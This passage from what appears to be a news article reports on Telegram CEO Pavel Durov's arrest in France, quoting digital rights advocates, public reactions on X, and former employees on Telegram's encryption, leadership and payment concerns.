“Civil society has had a complicated relationship with Telegram over the years,” says Natalia Krapiva, a lawyer at the digital rights group Access Now. “We have defended Telegram against attempts by authoritarian regimes to block and coerce the platform into providing encryption keys, but we have also been raising alarms about Telegram’s lack of human rights policies, reliable channel of communication, and remedy for its users.” Krapiva stresses that French authorities may try to force Durov to provide Telegram’s encryption keys to decrypt private messages, “which Russia has already tried to do in the past.”

The hashtag #FreePavel has been spreading online, including via X’s CEO, Elon Musk, who has posted numerous times about Durov’s arrest. “POV: It’s 2030 in Europe and you’re being executed for liking a meme,” he wrote on Saturday night in response to a post about the Telegram CEO’s detention. “The need to protect free speech has never been more urgent,” Robert F. Kennedy Jr., who on Friday endorsed Donald Trump for US president, wrote on X, where he referred to Telegram as “uncensored” and “encrypted.”

While Telegram is frequently described as an encrypted messaging app, messages are not end-to-end encrypted by default, and senior executives previously told WIRED that they view the platform as a social network. This is largely due to Channels—a one-to-many broadcast feature that allows unlimited subscribers to view posts.

One of the posts that has gained the most traction on X was by right-wing former Fox News journalist Tucker Carlson, who alluded to the oft-repeated but debatable story that Durov left Russia because the government tried to take over his company. “But in the end, it wasn’t Putin who arrested him for allowing the public to exercise free speech. It was a western country,” Carlson wrote in a post that has so far been viewed at least 5.7 million times. Carlson also linked to an hourlong interview he did with Durov earlier this year, one of the first and only interviews the Telegram CEO has given in recent years.

In Durov’s absence, Telegram’s future looks uncertain to some: “I am in shock, and everyone close to Pavel feels the same,” says Georgy Lobushkin, former head of PR at VK, a social network Durov cofounded, who is still in regular contact with Durov. “Nobody was prepared for this situation.” Asked if he worried about Telegram’s future and who could run the company in Durov’s absence, Lobushkin says: “\[I\] worry a lot.”

TF1Info, which first broke the news in France of Durov’s arrest, reported that it was “beyond doubt” Durov would remain in custody during the investigation. “Pavel Durov will end up in pretrial detention, that's for sure,” one unnamed investigator told reporters.

“No one in Telegram was prepared for such a scenario,” says Anton Rozenberg, who worked with Durov from the early days of VK in 2007, before working for Telegram from 2016 to 2017. Rozenberg foresaw Durov acquiring the best legal defense money could buy. “But without him, the messenger may have huge problems with management, all crucial decisions, and even payments,” he added, given Durov’s personal involvement in running the company. Rozenberg saw no obvious replacement for Durov, who makes key decisions on nearly all matters at Telegram—financing, development strategies, product design, monetization, and content moderation policy.

For now, everything can be expected to continue as normal, says Elies Campo, who directed Telegram’s growth, business, and partnerships from 2015 to 2021. “Depending on how long this is going to last, it’s like a government, right? There’s this structure, there’s self-momentum.” Campo adds that the company’s staff is small enough—around 60 employees—that the infrastructure won’t be affected.

The challenge, Campo concedes, would be if Durov needs to be physically present to pay providers—something Rozenberg also flagged.

“As far as I know, Pavel did the payments,” Campo says. “So what's going to happen when there needs to be some payments for infrastructure providers, or providers in terms of connectivity—and he's still under arrest?”

Tag

#auth